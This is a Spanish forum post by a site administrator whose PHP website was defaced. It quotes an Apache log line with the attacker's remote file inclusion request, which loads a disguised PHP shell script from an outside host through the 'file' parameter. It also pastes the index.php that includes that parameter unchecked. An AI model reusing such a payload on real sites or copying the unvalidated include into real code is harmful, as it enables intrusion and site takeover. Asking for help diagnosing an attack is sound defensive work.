Esta tarde me han hecho un defaced a la web q administro en mi trabajo (bueno una de mis webs)
Los logs de apache muestran esta linea entre otras muchas del hacker, pero esta es la importante:
200.209.52.2 - - [20/Apr/2005:15:46:04 +0200] "GET /seminario/index.php?file=www.markuswalter.net/lauftreff/cmd2.jpg?…\\index.html HTTP/1.0" 200 10229
La IP q sale es la del hacker, asi q no intenteis nada si creeis q es mi servidor.
Por lo que veo, es que me han colado un script en php (es el cmd2.jpg) a traves del index.php de y luego me han sustituido, el index.html de otra web q esta en otro directorio.
Lo que pasa es que no veo donde esta el fallo en mi index.php (por donde me consiguieron ejecutar el script)
Os pongo el codigo del index.php a ver si alguien me puede ayudar donde esta el fallo
require_once("includes/config.php");
require_once("includes/library.php");
if (empty($file)) {$file=$home_page;}
echo "
\n
\n
";
if (!$printable) {
echo "\n";
header_page(); echo "";
}
echo "\n \n";
if (!$printable) {
echo "\n";
open_menu ($menu3_title,$menu3_folder,$menu3_txt,$menu3_size,$menu3_type); echo "";
open_menu ($menu2_title,$menu2_folder,$menu2_txt,$menu2_size,$menu2_type);
/* echo "Convalidación por créditos de libre configuración
";*/
echo "
\n
\n
";
open_menu_plane ($menu1_title,$menu1_folder,$menu1_txt,$menu1_size,$menu1_type);
}
if (!$printable) { $view_td="yes"; } else { $view_td="no";}
// Cuerpo de la web.. aqui se hace un include del fichero a mostrar en su hueco correspondiente
if ($view_td=="yes") { // Mostramos o no el enlace Versión Imprimible
$td_print="Versión imprimible
";
} else {
$td_print="";
}
if (!$menu_name) {$menu_name="$welcome"; $td_print="";}
echo "
";
if (!$table) {
echo "
$menu_name
";
}
echo "
$td_print
";
include($file);
echo "
";
echo "
\n
\n
\n
\n
\n
";
?>Veo que los echo's no salen, de todas formas no creo que el fallo este en ellos, simplemente contienen html. De todas formas os cuelgo el fichero (link roto)
Gracias
